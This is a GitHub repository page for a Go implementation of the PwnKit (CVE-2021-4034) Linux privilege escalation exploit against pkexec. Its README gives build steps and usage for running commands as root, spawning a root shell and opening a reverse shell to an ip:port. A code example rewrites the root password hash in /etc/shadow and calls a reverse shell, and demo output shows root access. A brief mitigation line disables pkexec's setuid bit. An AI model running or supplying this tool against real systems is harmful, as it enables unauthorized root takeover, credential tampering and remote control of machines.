Skip to content
/ ez-pwnkit Public

Go implementation of the PwnKit Linux Local Privilege Escalation exploit (CVE-2021-4034)

5 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

OXDBXKXO/ez-pwnkit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits

cmd

cmd

 
 

internal

internal

 
 

.gitignore

.gitignore

 
 

Makefile

Makefile

 
 

README.md

README.md

 
 

exploit.go

exploit.go

 
 

go.mod

go.mod

 
 

Repository files navigation

ez-pwnkit

A pure-Go implementation of the CVE-2021-4034 PwnKit exploit.

The exploit use syscall.ForkExec to survive end of main program.

Installation

git clone https://github.com/OXDBXKXO/ez-pwnkit.git
cd ez-pwnkit
make

As the exploit relies on a malicious shared library, a PWN.so file is generated from payload.go and embed in the resulting exploit executable.

The Makefile uses sed to temporarily change the package name of the payload.go file to main, hence making this Makefile Linux-only.

As the Go payload is not as reliable as the C one, the Makefile will compile the exploit with the C payload by default. You can choose to compile with the Go payload using make build_go.

Usage

As standalone executable

$> ./exploit -h
Usage of ./exploit:
  -c string
        Run command as root in separate process
  -o    Pipe output of forked command to terminal
  -r string
        Open a reverse-shell in separate process. Format: ip:port
  -s    Spawn a root shell

The exploit can either be used with a command (-c), as a reverse-shell (-r) or spawn a root shell (-s).

$> ./exploit -s
sh-5.1#
$> ./exploit -c "cat /etc/passwd"
$> ./exploit -o -c "cat /etc/passwd"
[/etc/passwd content]

As package

package main

import (
    "github.com/OXDBXKXO/ez-pwnkit"
)

func main() {
    // Change root password to 'password'
    ez_pwnkit.Command(`sed -i -e 's,^root:[^:]\+:,root:$6$eymNRCK.KxwDM6vu$idH0swGW1nsnLb8fT1QibUho5xg7uGJT7fuiheLZHIi9M4gTSk0qIOlUIk2Mm9/Nz5C.T4GkgkmLcK5BtOPkS0:,' etc/shadow`, false)

    // Open a reverse-shell
	ez_pwnkit.RevShell("127.0.0.1:1337")
}

Note as Command and RevShell use syscall.ForkExec to run the exploit, resulting processes are separate from the main program and survive its end.

Although go-PwnKit can be imported to your project from Github, do not forget that you will execute an untrusted shared library as root. Using a locally compiled PWN.so is hence highly recommended. Just sayin' 😚

Demonstration

$> ./exploit
sh-5.1# id
uid=0(root) gid=0(root) groups=0(root)
sh-5.1#

Mitigation

Patch pkexec if possible, otherwise disable the setuid bit on the pkexec binary.

chmod 0755 /usr/bin/pkexec

Credits

This project is inspired by several other PoCs of the PwnKit exploit.

Thanks to An00bRektn for the straight-forward exploit setup.

Thanks to PaterGottesman and berdav for the clarity of the exploit explanation.

Thanks to dzonerzy for the GIO_USE_VFS trick.

About

Go implementation of the PwnKit Linux Local Privilege Escalation exploit (CVE-2021-4034)

Topics

go linux golang exploit cve golang-package lpe local-privilege-escalation pkexec cve-2021-4034 pwnkit

Resources

Readme
Activity

Stars

5 stars

Watchers

1 watching

Forks

2 forks
Report repository

Languages